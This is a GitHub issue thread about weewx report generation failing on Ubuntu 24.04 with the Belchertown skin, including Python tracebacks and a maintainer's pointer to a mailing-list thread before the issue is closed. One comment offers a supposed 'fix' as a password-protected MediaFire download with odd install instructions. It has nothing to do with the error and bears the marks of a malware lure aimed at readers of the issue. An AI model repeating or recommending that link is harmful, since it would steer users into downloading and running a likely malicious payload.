weewx/weewx #972: Ubuntu 24.04 and report run

Sebeck81, 2024-08-27:
Hello everyone,
I have now installed Ubuntu 24.04 LTS with weewx and the Belchertown skin for testing. 

When calling weectl report run the following error appears:

Using configuration file /etc/weewx/weewx.conf
All enabled reports will be run.
Generating as of last timestamp in the database.
Traceback (most recent call last):
  File "/usr/share/weewx/weewx/reportengine.py", line 248, in run
    obj.start()
  File "/usr/share/weewx/weewx/reportengine.py", line 465, in start
    self.run()
  File "/usr/share/weewx/weewx/imagegenerator.py", line 37, in run
    self.gen_images(self.gen_ts)
  File "/usr/share/weewx/weewx/imagegenerator.py", line 107, in gen_images
    image = plot.render()
            ^^^^^^^^^^^^^
  File "/usr/share/weewx/weeplot/genplot.py", line 218, in render
    self._renderDayNight(sdraw)
  File "/usr/share/weewx/weeplot/genplot.py", line 258, in _renderDayNight
    sdraw.rectangle(((xleft,self.yscale[0]),
  File "/usr/share/weewx/weeplot/utilities.py", line 442, in rectangle
    self.draw.rectangle(box_scaled, **options)
  File "/usr/lib/python3/dist-packages/PIL/ImageDraw.py", line 303, in rectangle
    self.draw.draw_rectangle(xy, fill, 1)
ValueError: x1 must be greater than or equal to x0
Traceback (most recent call last):
  File "/usr/share/weewx/weewx/reportengine.py", line 248, in run
    obj.start()
  File "/usr/share/weewx/weewx/reportengine.py", line 465, in start
    self.run()
  File "/usr/share/weewx/weewx/cheetahgenerator.py", line 166, in run
    ngen = self.generate(gen_dict[section_name], section_name, self.gen_ts)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/weewx/weewx/cheetahgenerator.py", line 226, in generate
    ngen += self.generate(section[subsection], subsection, gen_ts)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/weewx/weewx/cheetahgenerator.py", line 226, in generate
    ngen += self.generate(section[subsection], subsection, gen_ts)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/weewx/weewx/cheetahgenerator.py", line 309, in generate
    searchList = self._getSearchList(encoding, timespan,
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/weewx/weewx/cheetahgenerator.py", line 401, in _getSearchList
    search_list += obj.get_extension_list(timespan, db_lookup)
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/etc/weewx/bin/user/belchertown.py", line 612, in get_extension_list
    locale.format("%g", float(year_outTemp_max_range_total)),
    ^^^^^^^^^^^^^
AttributeError: module 'locale' has no attribute 'format'. Did you mean: '_format'?
Done.

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

tkeffer, 2024-08-27:
Please see this thread: https://groups.google.com/g/weewx-user/c/JgwO68aMyMY/m/cpD6Xs4_AgAJ

closed 2024-08-27 by tkeffer